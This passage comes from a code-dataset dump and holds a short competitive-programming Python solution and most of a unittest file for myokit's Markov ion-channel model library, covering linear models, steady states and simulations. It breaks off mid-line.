\"\")\n\nmain()\n","repo_name":"Nepumi-Jr/Garedami","sub_path":"StandardJudge/StdJudge.py","file_name":"StdJudge.py","file_ext":"py","file_size_in_byte":6709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"37004559655","text":"for _ in range(int(input())):\n n,k=map(int,input().split())\n l=sorted(list(map(int,input().split())))\n #print(l)\n sum_a=[]\n sum_b=[]\n for i in l:\n if(i>k):\n sum_b.append(i)\n else:\n sum_a.append(i)\n #result=sum(sum_a)\n for i in range(len(sum_b)-1):\n #print(sum_a)\n #print(i)\n if sum_b[i]>k:\n c=sum_b[i]-k\n sum_a.append(k)\n sum_b[i+1]-=c\n elif sum_b[i]==k:\n sum_a.append(sum_b[i])\n sum_a.append(sum_b[-1])\n #print(sum_a)\n print(sum(sum_a))\n","repo_name":"selvamanikannan/code-for-good","sub_path":"code2.py","file_name":"code2.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"303238145","text":"import os\nimport unittest\n\nimport numpy as np\n\nimport myokit\nimport myokit.lib.markov as markov\n\nfrom myokit.tests import DIR_DATA, WarningCollector\n\n\nclass LinearModelTest(unittest.TestCase):\n \"\"\"\n Tests the linear model class.\n \"\"\"\n\n def test_manual_creation(self):\n\n # Load model\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n\n # Select a number of states and parameters\n states = [\n 'ina.C3',\n 'ina.C2',\n 'ina.C1',\n 'ina.IF',\n 'ina.IS',\n model.get('ina.O'),\n ]\n parameters = [\n 'ina.p1',\n 'ina.p2',\n 'ina.p3',\n model.get('ina.p4'),\n ]\n current = 'ina.i'\n\n # Create a markov model\n m = markov.LinearModel(model, states, parameters, current)\n markov.LinearModel(model, states, parameters, model.get(current))\n\n # Check membrane potential\n self.assertEqual(m.membrane_potential(), 'membrane.V')\n\n # Check parameters\n parameters[3] = parameters[3].qname()\n for p in m.parameters():\n self.assertIn(p, parameters)\n\n # Test deprecated MarkovModel class\n with WarningCollector() as w:\n m2 = markov.MarkovModel(model, states, parameters, current)\n self.assertEqual(type(m2), markov.AnalyticalSimulation)\n self.assertIn('deprecated', w.text())\n\n # State doesn't exist\n self.assertRaisesRegex(\n markov.LinearModelError, 'Unknown state',\n markov.LinearModel, model, states + ['bert'], parameters, current)\n\n # State isn't a state\n self.assertRaisesRegex(\n markov.LinearModelError, 'not a state',\n markov.LinearModel, model, states + ['ina.i'], parameters, current)\n\n # State added twice\n self.assertRaisesRegex(\n markov.LinearModelError, 'twice',\n markov.LinearModel, model, states + ['ina.O'], parameters, current)\n\n # No parameters is allowed\n markov.LinearModel(model, states, None, current)\n\n # Non-literal parameter\n self.assertRaisesRegex(\n markov.LinearModelError, 'Unsuitable',\n markov.LinearModel, model, states, parameters + ['ina.i'], current)\n\n # Parameter added twice\n self.assertRaisesRegex(\n markov.LinearModelError, 'Parameter listed twice',\n markov.LinearModel,\n model, states, parameters + ['ina.p1'], current)\n\n # Unknown parameter\n self.assertRaisesRegex(\n markov.LinearModelError, 'Unknown parameter', markov.LinearModel,\n model, states, parameters + ['ina.p1000'], current)\n\n # Current is a state\n self.assertRaisesRegex(\n markov.LinearModelError, 'Current variable can not be a state',\n markov.LinearModel, model, states, parameters, 'ina.O')\n\n # Current is not a function of the states\n m2 = model.clone()\n markov.LinearModel(m2, states, parameters, current)\n m2.get(current).set_rhs(0)\n self.assertRaisesRegex(\n markov.LinearModelError, 'Current must be a function of',\n markov.LinearModel, m2, states, parameters, current)\n\n # Vm not given in model\n m2 = model.clone()\n markov.LinearModel(m2, states, parameters, current)\n m2.get('membrane.V').set_label(None)\n self.assertRaisesRegex(\n markov.LinearModelError, 'potential must be specified',\n markov.LinearModel, m2, states, parameters, current)\n markov.LinearModel(m2, states, parameters, current, vm='membrane.V')\n\n # Vm is a parameter\n self.assertRaisesRegex(\n markov.LinearModelError, 'list of parameters', markov.LinearModel,\n m2, states, parameters, current, vm=parameters[0])\n\n # Vm is a state\n self.assertRaisesRegex(\n markov.LinearModelError, 'list of states',\n markov.LinearModel, m2, states, parameters, current, vm=states[0])\n\n # Vm is the current\n self.assertRaisesRegex(\n markov.LinearModelError, 'be the current',\n markov.LinearModel, m2, states, parameters, current, vm=current)\n\n # States must have bidrectional dependencies\n m2 = model.clone()\n # Set bad config, but with columns still summing to zero\n m2.get('ina.C3').set_rhs('ina.C1')\n x = m2.get('ina.C2')\n x.set_rhs(str(x.rhs()) + '+ a12 * C2 + - b12 * C1')\n x = m2.get('ina.C1')\n x.set_rhs(str(x.rhs()) + ' - ina.C1')\n self.assertRaisesRegex(\n markov.LinearModelError, 'not vice versa',\n markov.LinearModel, m2, states, parameters, current)\n\n # States must sum to 1\n m2 = model.clone()\n m2.get(states[0]).set_initial_value(0.6)\n m2.get(states[1]).set_initial_value(0.6)\n self.assertRaisesRegex(\n markov.LinearModelError, 'sum of states',\n markov.LinearModel, m2, states, parameters, current)\n\n # Derivatives per column don't sum to zero\n m2 = model.clone()\n x = m2.get(states[0])\n x.set_rhs('2 * ' + str(x.rhs()))\n self.assertRaisesRegex(\n markov.LinearModelError, 'sum to non-zero',\n markov.LinearModel, m2, states, parameters, current)\n\n # Not a linear model\n m2 = model.clone()\n x = m2.get(states[0])\n y = m2.get(states[1])\n # Set rhs to something non-linear, make sure columns still sum to 0\n x.set_rhs(str(x.rhs()) + ' + C1^2')\n y.set_rhs(str(y.rhs()) + ' - C1^2')\n self.assertRaisesRegex(\n markov.LinearModelError, 'linear combination of states',\n markov.LinearModel, m2, states, parameters, current)\n\n # Current not a linear combination of states\n m2 = model.clone()\n m2.get(current).set_rhs('sqrt(ina.O)')\n self.assertRaisesRegex(\n markov.LinearModelError, 'linear combination of states',\n markov.LinearModel, m2, states, parameters, current)\n\n def test_linear_model_from_component(self):\n\n # Load model\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n\n # Create a markov model\n markov.LinearModel.from_component(model.get('ina'))\n\n # Test deprecated MarkovModel class\n with WarningCollector() as w:\n m = markov.MarkovModel.from_component(model.get('ina'))\n self.assertEqual(type(m), markov.AnalyticalSimulation)\n self.assertIn('deprecated', w.text())\n\n # Test partially automatic creation\n states = [\n 'ina.C3',\n 'ina.C2',\n 'ina.C1',\n 'ina.IF',\n 'ina.IS',\n model.get('ina.O'),\n ]\n markov.LinearModel.from_component(model.get('ina'), states=states)\n\n parameters = [\n 'ina.p1',\n 'ina.p2',\n 'ina.p3',\n model.get('ina.p4',)\n ]\n markov.LinearModel.from_component(\n model.get('ina'), parameters=parameters)\n\n current = 'ina.i'\n markov.LinearModel.from_component(model.get('ina'), current=current)\n\n markov.LinearModel.from_component(\n model.get('ina'), current=model.get(current))\n\n # No current --> This is allowed\n m2 = model.clone()\n m2.get('ina').remove_variable(m2.get('ina.i'))\n m = markov.LinearModel.from_component(m2.get('ina'))\n\n # Two currents\n m2 = model.clone()\n v = m2.get('ina').add_variable('i2')\n v.set_rhs(m2.get('ina.i').rhs().clone())\n self.assertRaisesRegex(\n markov.LinearModelError,\n 'more than one variable that could be a current',\n markov.LinearModel.from_component, m2.get('ina'))\n\n # Explict vm\n m2 = model.clone()\n m2.get('membrane.V').set_label(None)\n markov.LinearModel.from_component(model.get('ina'), vm='membrane.V')\n self.assertRaisesRegex(\n markov.LinearModelError,\n 'labeled as \"membrane_potential\"',\n markov.LinearModel.from_component, m2.get('ina'))\n\n def test_linear_model_matrices(self):\n\n # Create model\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n m = markov.LinearModel.from_component(model.get('ina'))\n\n # Test shape of output\n A, B = m.matrices(-20, range(21))\n self.assertEqual(A.shape, (6, 6))\n self.assertEqual(B.shape, (6, ))\n\n # Requires 21 parameters\n self.assertRaises(ValueError, m.matrices, -20, range(3))\n\n def test_linear_model_steady_state_1(self):\n # Test finding the steady-state of the Clancy model\n\n # Create model\n filename = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(filename)\n m = markov.LinearModel.from_component(model.get('ina'))\n\n # Get steady state\n ss = np.array(m.steady_state())\n\n # Check that this is a valid steady state\n self.assertTrue(np.all(ss >= 0))\n self.assertTrue(np.all(ss <= 1))\n\n # Check that derivatives with ss are close to zero\n ss = list(ss)\n model.set_initial_values(ss + ss) # Model has 2 ina's\n derivs = model.evaluate_derivatives()\n for i in range(len(ss)):\n self.assertAlmostEqual(0, derivs[i])\n\n # Try with awful parameters\n self.assertRaisesRegex(\n markov.LinearModelError, 'positive eigenvalues',\n m.steady_state, parameters=[-1] * 21)\n\n def test_linear_model_steady_state_2(self):\n # Test finding the steady-state of one of Dominic's models, which\n # exposed a bug in the steady state code\n\n # Create model\n filename = os.path.join(DIR_DATA, 'dom-markov.mmt')\n model = myokit.load_model(filename)\n m = markov.LinearModel.from_component(model.get('ikr'))\n\n # Get steady state\n ss = np.array(m.steady_state())\n\n # Check that this is a valid steady state\n self.assertTrue(np.all(ss >= 0))\n self.assertTrue(np.all(ss <= 1))\n\n # Check that derivatives with ss are close to zero\n model.set_initial_values(ss)\n derivs = model.evaluate_derivatives()\n for i in range(len(ss)):\n self.assertAlmostEqual(0, derivs[i])\n\n def test_rates(self):\n\n # Load model\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n\n # Create a markov model\n m = markov.LinearModel.from_component(model.get('ina'))\n\n # Test rates method runs\n self.assertEqual(len(m.rates()), 12)\n m.rates(parameters=[0.01] * 21)\n self.assertRaisesRegex(\n ValueError, 'Illegal parameter vector size',\n m.rates, parameters=[0.01] * 22)\n\n def test_initial_value_conversion(self):\n # Tests that initial value expressions are converted to floats\n\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n model.get('ina.C3').set_initial_value('1 / sqrt(7)')\n model.get('ina.C2').set_initial_value('-1 / log(ina_ref.p)')\n model.get('ina.C1').set_initial_value(0.5134619065149598)\n m = markov.LinearModel.from_component(model.get('ina'))\n x0 = m.default_state()\n self.assertEqual(len(x0), 6)\n self.assertIsInstance(x0[0], float)\n self.assertIsInstance(x0[1], float)\n self.assertAlmostEqual(x0[0], 0.3779644730092272)\n self.assertAlmostEqual(x0[1], 0.10857362047581297)\n\n\nclass AnalyticalSimulationTest(unittest.TestCase):\n \"\"\"\n Tests :class:`myokit.lib.markov.AnalyticalSimulation`.\n \"\"\"\n\n def test_create_and_run(self):\n # Test basics of analytical simulation\n\n # Create a simulation\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n m = markov.LinearModel.from_component(model.get('ina'))\n\n # Bad constructors\n self.assertRaisesRegex(\n ValueError, 'LinearModel', markov.AnalyticalSimulation, 1)\n self.assertRaisesRegex(\n ValueError, 'Protocol', markov.AnalyticalSimulation, m, 1)\n\n # Create properly\n s = markov.AnalyticalSimulation(m)\n\n # Times to evaluate at\n times = np.linspace(0, 100, 5)\n\n # Voltages to test at\n voltages = np.arange(-70, 0, 30)\n\n # Generate traces with \"solve\" method\n state = s.state()\n dstate = s.default_state()\n for v in voltages:\n s.set_membrane_potential(v)\n x, i = s.solve(times)\n\n # Solve shouldn't change the state\n self.assertEqual(state, s.state())\n self.assertEqual(dstate, s.default_state())\n\n # Run for a bit\n self.assertIsInstance(s.run(10), myokit.DataLog)\n\n # Calculate current for a particular state\n self.assertIsInstance(s.current(s.state()), float)\n\n # No current variable? Then current can't be calculated\n model2 = model.clone()\n model2.get('ina').remove_variable(model2.get('ina.i'))\n m2 = markov.LinearModel.from_component(model2.get('ina'))\n s2 = markov.AnalyticalSimulation(m2)\n self.assertRaisesRegex(\n Exception, 'did not specify a current', s2.current, s2.state())\n # But simulation still works\n self.assertIsInstance(s2.run(10), myokit.DataLog)\n del model2, m2, s2\n\n # Create protocol\n\n # Protocol times: prep, step, post, full\n tprep = 2800\n tstep = 15\n tpost = 0\n\n # Step voltages\n vhold = -80\n vlo = -140\n vhi = 100\n res = 50\n v = np.arange(vlo, vhi + res, res)\n p = myokit.pacing.steptrain(v, vhold, tprep, tstep, tpost)\n t = p.characteristic_time()\n\n # Create simulation with protocol (set_protocol is not supported)\n s = markov.AnalyticalSimulation(m, p)\n\n # Membrane potential and protocol can't be used simultaneously\n self.assertRaisesRegex(\n Exception, 'cannot be set if', s.set_membrane_potential, -80)\n\n # Pre should change the state and default state\n state = s.state()\n dstate = s.default_state()\n s.pre(tprep + tstep)\n self.assertNotEqual(state, s.state())\n self.assertNotEqual(dstate, s.default_state())\n self.assertRaises(ValueError, s.pre, -1)\n\n # Run should change the state, not the default state\n state = s.state()\n dstate = s.default_state()\n d = s.run(t)\n self.assertNotEqual(state, s.state())\n self.assertEqual(dstate, s.default_state())\n self.assertRaisesRegex(ValueError, 'Duration', s.run, -1)\n self.assertRaisesRegex(\n ValueError, 'Log interval', s.run, 1, log_interval=-1)\n d['hello'] = [1, 2, 3]\n self.assertRaisesRegex(ValueError, 'extra keys', s.run, 1, log=d)\n del d['hello']\n del d[next(iter(d.keys()))]\n self.assertRaisesRegex(ValueError, 'missing', s.run, 1, log=d)\n\n # Reset should reset the state\n s.reset()\n self.assertEqual(state, s.state())\n\n # Run can append to log\n d = s.run(10)\n n = len(d['engine.time'])\n e = s.run(1, log=d)\n self.assertIs(d, e)\n self.assertTrue(len(d['engine.time']) > n)\n\n def test_analytical_simulation_properties(self):\n # Test basic get/set methods of analytical simulation.\n\n # Create a simulation\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n m = markov.LinearModel.from_component(model.get('ina'))\n s = markov.AnalyticalSimulation(m)\n\n # membrane potential\n self.assertEqual(\n s.membrane_potential(), model.get('membrane.V').eval())\n s.set_membrane_potential(10)\n self.assertEqual(s.membrane_potential(), 10)\n\n # Parameter values\n p = list(range(len(s.parameters())))\n self.assertNotEqual(p, s.parameters())\n s.set_parameters(p)\n self.assertEqual(p, s.parameters())\n self.assertRaises(ValueError, s.set_parameters, p[:-1])\n\n # Change parameter with set_constant\n p[3] += 1\n self.assertNotEqual(p, s.parameters())\n s.set_constant(m.parameters()[3], p[3])\n self.assertEqual(p, s.parameters())\n\n # State\n state = np.zeros(len(s.state()))\n state[0] = 0.5\n state[1] = 0.5\n self.assertNotEqual(list(state), list(s.state()))\n s.set_state(state)\n self.assertEqual(list(state), list(s.state()))\n self.assertRaisesRegex(\n ValueError, 'Wrong size', s.set_state, state[:-1])\n state[0] += 0.1\n self.assertRaisesRegex(\n ValueError, 'sum to 1', s.set_state, state)\n state[0] = -.1\n state[1] = 1.1\n self.assertRaisesRegex(\n ValueError, 'negative', s.set_state, state)\n\n # Default state\n dstate = np.zeros(len(s.default_state()))\n dstate[0] = 0.5\n dstate[1] = 0.5\n self.assertNotEqual(list(dstate), list(s.default_state()))\n s.set_default_state(dstate)\n self.assertEqual(list(dstate), list(s.default_state()))\n self.assertRaisesRegex(\n ValueError, 'Wrong size', s.set_default_state, dstate[:-1])\n dstate[0] += 0.1\n self.assertRaisesRegex(\n ValueError, 'sum to 1', s.set_default_state, dstate)\n dstate[0] = -.1\n dstate[1] = 1.1\n self.assertRaisesRegex(\n ValueError, 'negative', s.set_default_state, dstate)\n\n def test_against_cvode(self):\n # Validate against a cvode sim.\n\n # Get a model\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n\n # Create a protocol\n vs = [-30, -20, -10]\n p = myokit.pacing.steptrain(\n vsteps=vs,\n vhold=-120,\n tpre=8,\n tstep=2,\n tpost=0)\n t = p.characteristic_time()\n\n # Run an analytical simulation\n dt = 0.01\n m = markov.LinearModel.from_component(model.get('ina'))\n s1 = markov.AnalyticalSimulation(m, p)\n d1 = s1.run(t, log_interval=dt).npview()\n\n s2 = myokit.Simulation(model, p)\n s2.set_tolerance(1e-8, 1e-8)\n d2 = s2.run(t, log_interval=dt).npview()\n\n # Test protocol output is the same\n e = np.abs(d1['membrane.V'] - d2['membrane.V'])\n if False:\n import matplotlib.pyplot as plt\n plt.figure()\n plt.plot(d1['membrane.V'])\n plt.plot(d2['membrane.V'])\n plt.show()\n self.assertEqual(np.max(e), 0)\n\n # Test current output is very similar\n e = np.abs(d1['ina.i'] - d2['ina.i'])\n if False:\n import matplotlib.pyplot as plt\n plt.figure()\n plt.plot(d1['ina.i'])\n plt.plot(d2['ina.i'])\n plt.figure()\n plt.plot(d1['ina.i'] - d2['ina.i'])\n plt.show()\n self.assertLess(np.max(e), 2e-4)\n\n\nclass DiscreteSimulationTest(unittest.TestCase):\n \"\"\"\n Tests :class:`myokit.lib.markov.DiscreteSimulationTest`.\n \"\"\"\n\n def test_basics(self):\n # Test the DiscreteSimulation class, running, resetting etc..\n\n # Create a simulation\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n m = markov.LinearModel.from_component(model.get('ina'))\n\n # Bad constructors\n self.assertRaisesRegex(\n ValueError, 'LinearModel', markov.DiscreteSimulation, 1)\n self.assertRaisesRegex(\n ValueError, 'Protocol', markov.DiscreteSimulation, m, 1)\n self.assertRaisesRegex(\n ValueError, 'at least 1',\n markov.DiscreteSimulation, m, nchannels=0)\n\n # Test running without a protocol\n s = markov.DiscreteSimulation(m)\n s.run(1)\n\n # Rest running for a very short time doesn't cause crash\n s.run(0)\n\n # Create protocol\n\n # Protocol times: prep, step, post, full\n tprep = 10\n tstep = 150\n tpost = 0\n\n # Step voltages\n vhold = -80\n vlo = -140\n vhi = 100\n res = 50\n v = np.arange(vlo, vhi + res, res)\n p = myokit.pacing.steptrain(v, vhold, tprep, tstep, tpost)\n\n # Create simulation with protocol (set_protocol is not supported)\n np.random.seed(1)\n s = markov.DiscreteSimulation(m, p)\n\n # Membrane potential and protocol can't be used simultaneously\n self.assertRaisesRegex(\n Exception, 'cannot be set if', s.set_membrane_potential, -80)\n\n # Pre should change the state and default state\n state = s.state()\n dstate = s.default_state()\n s.pre(tprep + tstep)\n self.assertNotEqual(state, s.state())\n self.assertNotEqual(dstate, s.default_state())\n self.assertRaisesRegex(ValueError, 'negative', s.pre, -1)\n\n # Run should change the state, not the default state\n state = s.state()\n dstate = s.default_state()\n d = s.run(15)\n self.assertNotEqual(state, s.state())\n self.assertEqual(dstate, s.default_state())\n self.assertRaisesRegex(ValueError, 'negative', s.run, -1)\n\n # Reset should reset the state\n s.reset()\n self.assertEqual(state, s.state())\n\n # Run can append to log\n n = len(d['engine.time'])\n e = s.run(1, log=d)\n self.assertIs(d, e)\n self.assertTrue(len(d['engine.time']) > n)\n self.assertEqual(len(d['engine.time']), len(d['membrane.V']))\n self.assertEqual(len(d['engine.time']), len(d['ina.i']))\n self.assertEqual(len(d['engine.time']), len(d['ina.O']))\n d2 = d.clone()\n del d2[next(iter(d2.keys()))]\n self.assertRaisesRegex(ValueError, 'missing', s.run, 1, log=d2)\n d2 = d.clone()\n d2['hello'] = [1, 2, 3]\n self.assertRaisesRegex(ValueError, 'extra', s.run, 1, log=d2)\n\n #\n # Test without current variable\n #\n model.get('ina').remove_variable(model.get('ina.i'))\n m = markov.LinearModel.from_component(model.get('ina'))\n\n # Create simulation with protocol (set_protocol is not supported)\n np.random.seed(1)\n s = markov.DiscreteSimulation(m, p)\n d = s.run(10)\n n = len(d['engine.time'])\n e = s.run(1, log=d)\n self.assertIs(d, e)\n self.assertTrue(len(d['engine.time']) > n)\n self.assertEqual(len(d['engine.time']), len(d['membrane.V']))\n self.assertEqual(len(d['engine.time']), len(d['ina.O']))\n self.assertNotIn('ina.i', d)\n d2 = d.clone()\n del d2[next(iter(d2.keys()))]\n self.assertRaisesRegex(ValueError, 'missing', s.run, 1, log=d2)\n d2 = d.clone()\n d2['hello'] = [1, 2, 3]\n self.assertRaisesRegex(ValueError, 'extra', s.run, 1, log=d2)\n\n def test_discrete_simulation_properties(self):\n # Test basic get/set methods of discrete simulation.\n\n # Create a simulation\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n m = markov.LinearModel.from_component(model.get('ina'))\n s = markov.DiscreteSimulation(m, nchannels=50)\n\n # membrane potential\n self.assertEqual(\n s.membrane_potential(), model.get('membrane.V').eval())\n s.set_membrane_potential(10)\n self.assertEqual(s.membrane_potential(), 10)\n\n # Number of channels\n self.assertEqual(s.number_of_channels(), 50)\n\n # Parameter values\n p = list(range(len(s.parameters())))\n self.assertNotEqual(p, s.parameters())\n s.set_parameters(p)\n self.assertEqual(p, s.parameters())\n self.assertRaises(ValueError, s.set_parameters, p[:-1])\n\n # Change parameter with set_constant\n p[3] += 1\n self.assertNotEqual(p, s.parameters())\n s.set_constant(m.parameters()[3], p[3])\n self.assertEqual(p, s.parameters())\n\n # State\n state = np.zeros(len(s.state()))\n state[0] = 25\n state[1] = 25\n self.assertNotEqual(list(state), list(s.state()))\n s.set_state(state)\n self.assertEqual(list(state), list(s.state()))\n self.assertRaisesRegex(\n ValueError, 'Wrong size', s.set_state, state[:-1])\n state[0] += 1\n self.assertRaisesRegex(\n ValueError, 'must equal', s.set_state, state)\n state[0] = -1\n state[1] = 51\n self.assertRaisesRegex(\n ValueError, 'negative', s.set_state, state)\n\n # Default state\n dstate = np.zeros(len(s.default_state()))\n dstate[0] = 25\n dstate[1] = 25\n self.assertNotEqual(list(dstate), list(s.default_state()))\n s.set_default_state(dstate)\n self.assertEqual(list(dstate), list(s.default_state()))\n self.assertRaisesRegex(\n ValueError, 'Wrong size', s.set_default_state, dstate[:-1])\n dstate[0] += 1\n self.assertRaisesRegex(\n ValueError, 'must equal', s.set_default_state, dstate)\n dstate[0] = -1\n dstate[1] = 51\n self.assertRaisesRegex(\n ValueError, 'negative', s.set_default_state, dstate)\n\n # Discretize state\n self.assertEqual(s.discretize_state([0.4, 0.6]), [20, 30])\n self.assertRaisesRegex(\n ValueError, 'must equal 1', s.discretize_state, [0.5, 0.6])\n\n\nclass MarkovFunctionsTest(unittest.TestCase):\n \"\"\"\n Test cases for finding Markov models.\n \"\"\"\n\n def test_convert_markov_models_to_compact_form(self):\n # Tests convert_markov_models_to_compact_form()\n\n # Load clancy model, has two versions of same markov model in it\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model1 = myokit.load_model(fname)\n\n models = markov.find_markov_models(model1)\n self.assertEqual(len(models), 2)\n m1, m2 = models\n\n # Check both models are full ODE form\n n1 = sum([1 for x in m1 if x.is_state()])\n self.assertEqual(n1, len(m1))\n n2 = sum([1 for x in m2 if x.is_state()])\n self.assertEqual(n2, len(m2))\n\n # Convert both compact form\n model2 = markov.convert_markov_models_to_compact_form(model1)\n models = markov.find_markov_models(model2)\n self.assertEqual(len(models), 2)\n m1, m2 = models\n n1 = sum([1 for x in m1 if x.is_state()])\n self.assertEqual(n1, len(m1) - 1)\n n2 = sum([1 for x in m2 if x.is_state()])\n self.assertEqual(n2, len(m2) - 1)\n\n # Check states evaluate to the same value\n self.assertEqual(\n model1.get('ina.C1').eval(), model2.get('ina.C1').eval())\n self.assertEqual(\n model1.get('ina.C2').eval(), model2.get('ina.C2').eval())\n self.assertEqual(\n model1.get('ina.C3').eval(), model2.get('ina.C3').eval())\n self.assertEqual(\n model1.get('ina.IF').eval(), model2.get('ina.IF').eval())\n self.assertEqual(\n model1.get('ina.IS').eval(), model2.get('ina.IS').eval())\n self.assertEqual(\n model1.get('ina.O').eval(), model2.get('ina.O').eval())\n\n # Doing it twice should have no effect\n model3 = markov.convert_markov_models_to_compact_form(model2)\n self.assertEqual(model2.code(), model3.code())\n\n def test_convert_markov_models_to_full_ode_form(self):\n # Tests convert_markov_models_to_compact_form()\n\n # Load clancy model, has two versions of same markov model in it\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model1 = myokit.load_model(fname)\n\n # Convert to compact form, and check that it worked\n model1 = markov.convert_markov_models_to_compact_form(model1)\n m1, m2 = markov.find_markov_models(model1)\n n1 = sum([1 for x in m1 if x.is_state()])\n self.assertEqual(n1, len(m1) - 1)\n n2 = sum([1 for x in m2 if x.is_state()])\n self.assertEqual(n2, len(m2) - 1)\n\n # Now convert to full form\n model2 = markov.convert_markov_models_to_full_ode_form(model1)\n m1, m2 = markov.find_markov_models(model2)\n n1 = sum([1 for x in m1 if x.is_state()])\n self.assertEqual(n1, len(m1))\n n2 = sum([1 for x in m2 if x.is_state()])\n self.assertEqual(n2, len(m2))\n\n # Check states evaluate to the same value\n self.assertEqual(\n model1.get('ina.C1').eval(), model2.get('ina.C1').eval())\n self.assertEqual(\n model1.get('ina.C2').eval(), model2.get('ina.C2').eval())\n self.assertEqual(\n model1.get('ina.C3').eval(), model2.get('ina.C3').eval())\n self.assertEqual(\n model1.get('ina.IF').eval(), model2.get('ina.IF').eval())\n self.assertEqual(\n model1.get('ina.IS').eval(), model2.get('ina.IS').eval())\n self.assertEqual(\n model1.get('ina.O').eval(), model2.get('ina.O').eval())\n\n # Doing it twice should have no effect\n model3 = markov.convert_markov_models_to_full_ode_form(model2)\n self.assertEqual(model2.code(), model3.code())\n\n def test_find_markov_models(self):\n # Tests find_markov_models()\n\n # Load clancy model, has two versions of same markov model in it\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n\n models = markov.find_markov_models(model)\n self.assertEqual(len(models), 2)\n\n # Check states and ordering\n m1, m2 = models\n self.assertEqual([v.qname() for v in m1], [\n 'ina.C1', 'ina.C2', 'ina.C3', 'ina.IF', 'ina.IS', 'ina.O'])\n self.assertEqual([v.qname() for v in m2], [\n 'ina_ref.C1', 'ina_ref.C2', 'ina_ref.C3', 'ina_ref.IF',\n 'ina_ref.IS', 'ina_ref.O'])\n del models, m1, m2\n\n # Try with `1 - sum(xi)` state\n c = model.get('ina_ref')\n v = c.get('C3')\n v.demote()\n v.set_rhs('1 - C1 - C2 - IF - IS - O')\n models = markov.find_markov_models(model)\n self.assertEqual(len(models), 2)\n m1, m2 = models\n self.assertEqual([v.qname() for v in m2], [\n 'ina_ref.C1', 'ina_ref.C2', 'ina_ref.C3', 'ina_ref.IF',\n 'ina_ref.IS', 'ina_ref.O'])\n del models, m1, m2\n\n # Try with `1 - sum(xi)` state, with a funny RHS\n c = model.get('ina_ref')\n v = c.get('C3')\n v.set_rhs('-(+IF + C1 -(-IS - C2)) + 1 - O')\n models = markov.find_markov_models(model)\n self.assertEqual(len(models), 2)\n m1, m2 = models\n self.assertEqual([v.qname() for v in m2], [\n 'ina_ref.C1', 'ina_ref.C2', 'ina_ref.C3', 'ina_ref.IF',\n 'ina_ref.IS', 'ina_ref.O'])\n\n def test_find_markov_models_bad(self):\n # Tests find_markov_models() for non-markov models\n\n # Load clancy model, has two versions of same markov model in it\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n moodel = myokit.load_model(fname)\n\n # Remove ina_ref component\n c = moodel.get('ina_ref')\n for v in c.variables(deep=True):\n v.set_rhs(0)\n for v in list(c.variables(deep=True)):\n c.remove_variable(v, recursive=True)\n\n # Only one markov model left at this point\n self.assertEqual(len(markov.find_markov_models(moodel)), 1)\n\n # Check searching states that no-one refers to\n # (And for cases where not each state is a linear combo)\n m = moodel.clone()\n for v in list(m.get('ina.C1').refs_by(True)):\n v.set_rhs(3)\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n\n # Test with one 1-minus state\n m = moodel.clone()\n v = m.get('ina.C3')\n v.demote()\n v.set_rhs('1 - C1 - C2 - IF - IS - O')\n self.assertEqual(len(markov.find_markov_models(m)), 1)\n\n # Test without a 1\n v.set_rhs('2 - C1 - C2 - IF - IS - O')\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n v.set_rhs('-C1 - C2 - IF - IS - O')\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n\n # Test 1-... contains non-linear terms\n v.set_rhs('1 - C1 - C2 - IF - IS - O - O^2')\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n\n # Test 1-... contains terms with a factor other than -1\n v.set_rhs('1 - C1 - C2 - IF - IS - O - O')\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n\n # Test if there's multiple variables with a 1-... RHS\n m = moodel.clone()\n v = m.get('ina.C3')\n v.demote()\n v.set_rhs('1 - C1 - C2 - IF - IS - O')\n self.assertEqual(len(markov.find_markov_models(m)), 1)\n v = m.get('ina').add_variable('C4')\n v.set_rhs('1 - C1 - C2 - IF - IS - O')\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n\n # But having an extra variable is fine, if the rest checks out!\n m = moodel.clone()\n v = m.get('ina').add_variable('C4')\n v.set_rhs('1 - C1 - C2 - C3 - IF - IS - O')\n self.assertEqual(len(markov.find_markov_models(m)), 1)\n\n # Must have at least two states\n m = myokit.Model()\n c = m.add_component('c')\n t = c.add_variable('time')\n t.set_binding('time')\n v = c.add_variable('v')\n v.promote(0.1)\n self.assertEqual(len(markov.find_markov_models(m)), 0)\n\n def test_linear_combination(self):\n # Tests _linear_combination()\n\n # Load model, to create interesting RHS\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n v1 = model.get('ina.C1')\n v2 = model.get('ina.C2')\n v3 = model.get('ina.C3')\n v4 = model.get('ina.IF')\n v5 = model.get('ina.IS')\n v6 = model.get('ina.O')\n\n # Test C1 rhs\n f = markov._linear_combination(v1.rhs(), [v1, v2, v3, v4, v5, v6])\n self.assertEqual(f[0].code(), '-(ina.a13 + 